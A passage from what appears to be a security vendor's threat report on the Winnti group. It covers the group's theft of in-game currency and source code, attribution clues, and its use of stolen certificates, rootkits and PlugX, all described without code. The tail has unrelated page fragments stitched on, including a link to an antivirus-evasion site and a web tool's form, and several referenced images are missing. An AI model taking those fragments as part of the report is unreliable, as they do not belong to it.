      Based on the available information, we have singled out three main monetization schemes that could be used by the Winnti team.
      1. The unfair accumulation of in-game currency/“gold” in online games and the conversion of virtual funds into real money.
      2. Theft of source code from the online games server to search for vulnerabilities in games – often linked to point 1.
      3. Theft of source code from the server part of popular online games to further deploy pirate servers.
      Let’s look at an example. During our investigation of an infection at a computer game company, we found that malware had been created for a particular service on the company’s server. The malicious program was looking for a specific process running on the server, injected code into it, and then sought out two places in the process code where it could conceal call commands for its function interceptors. Using these function interceptors, the malicious programs modified process data which was processed in those two places, and returned control back. Thus, the attackers change the normal execution of the server processes. Unfortunately, the company was not able to share its targeted application with us, and we cannot say exactly how this malicious interference affected gaming processes. The company concerned told us that the attackers’ aim was to acquire gaming “gold” illegally.
      Malicious activity like this has an adverse impact on the game itself, tilting the balance in favor of cheats. But any changes the Winnti team introduces into the game experience are unlikely to be very noticeable. After all, maintaining a skillful balance is the main attribute of online games! Users will simply stop playing if they feel that other players are using non-standard methods to create an advantage beyond normal gameplay or if the game loses its intrinsic competitiveness due to resources or artifacts appearing in the game without the developers’ knowledge. At the same time the attackers are keen for the game to remain popular; otherwise, they would be unable to effectively turn all the time and effort of infecting a gaming company into financial gain.
      Members of the Winnti team are patient and cautious. Cybercriminals have affected the processes of the online games from the infected companies and stolen money from them for years, but they have found ways of doing this without attracting attention to themselves.

      Source of Attacks

      So, who is behind Winnti? While analyzing the malicious files that we detected during our investigation we found some details which may cast some light on the source of the attacks.
      As part of our investigation, we monitored exactly what the cybercriminals did on an infected PC. In particular, they they downloaded an auxiliary program ff._exe to the Config.Msi folder on the infected machine. This code searches for HTML, MS Excel, MS Word, Adobe, PowerPoint and MS Works documents and text files (.txt) on the hard drive.
      Debugging lines were found in ff._exe_ that possibly point to the nationality of the cybercriminals. They were not immediately noticeable because they looked like this in the editor:
      However, during a detailed analysis it emerged that the text is in Chinese Simplified GBK coding. This is what these lines look in Chinese:
      Below is a machine translation of this text into English:
      Not identify the type of file system
      Below is a translation of the text by interpreter
      Open the volume failed
      Failed to get the file system type
      Failed to read volume
      Volumes do not open or open failed
      Navigate to the root directory of the error
      Error memory read pointer
      Memory is too small
      File does not exist
      Failed to get the file mft index sector
      Access to file data fail
      Volume and open volumes are not the same
      The same volume and open volume



      In addition, cybercriminals used the AheadLib program to create malicious libraries (for details, see the second part of the article). This is a program with a Chinese interface.
      Chinese text was also found in one of the components of the malicious program CmdPlus.dll plug-in:

      Translation: The process is complete!!
      It would appear that the attackers can at least speak Chinese. However, not everything is so clear cut: because the file transfer plug-in has not been implemented entirely safely, a command which includes the attackers’ local path (where the file comes from and where it is saved to) arrives during the process of downloading/uploading files on the infected system. While monitoring the cybercriminals’ activity on the infected machine, we noticed they uploaded the certificate they found in the infected system, and the network traffic reflected the local path indicating the place where they saved the file on their computer:
      These characters appear to be Korean, meaning “desktop”. This means the attackers were working on a Korean Windows operating system. Therefore, we can presume that the attack is not the exclusive work of Chinese-speaking cybercriminals.

      Conclusions

      Our research revealed long-term oriented large scale cyberespionage campaign of a criminal group with Chinese origins. These attacks are not new, many other security researchers have published details of various cybercriminal groups coming from China. However, current hacking group has distinguishable features that make it stand out among others:
      • massive abuse of digital signatures; the attackers used digital signatures of one victim company to attack other companies and steal more digital certificates;
      • usage of kernel level 64-bit signed rootkit;
      • abusing great variety of public Internet resources to store control commands for the malware in an encrypted form;
      • sharing/selling stolen certificates to other groups that had different objectives (attacks against Uyghur and Tibetan activists);
      • stealing source codes and other intellectual property of software developers in online gaming industry.
      The malicious program which we call “Winnti” has evolved significantly since it first emerged; however we classify all its variants in two main generations: 1.x and 2.x.
      We have published the technical description of the first generation of Winnti in a separate article .
      The second generation (2.x) was used to conduct an attack which we investigated during its active stage. We successfully prevented data transfer to the cybercriminals’ server and isolated the infected systems in the company’s local network. The incidents, as well as results of our investigation, are described in the full report on the Winnti group (PDF).
      In addition, we discovered that the Winnti group uses a popular backdoor known as PlugX which also has Chinese origins. This backdoor had previously been seen almost exclusively in attacks targeting Tibetan activists.
      Read further

      淡定免杀网

      http://www.shanghaisn.com/

      View HTTP Request and Response Header

      http://web-sniffer.net/

      For more information on HTTP see RFC 2616
      HTTP(S)-URL: (IDN allowed)
      HTTP version:
      • Request type:

      Features:

      See also: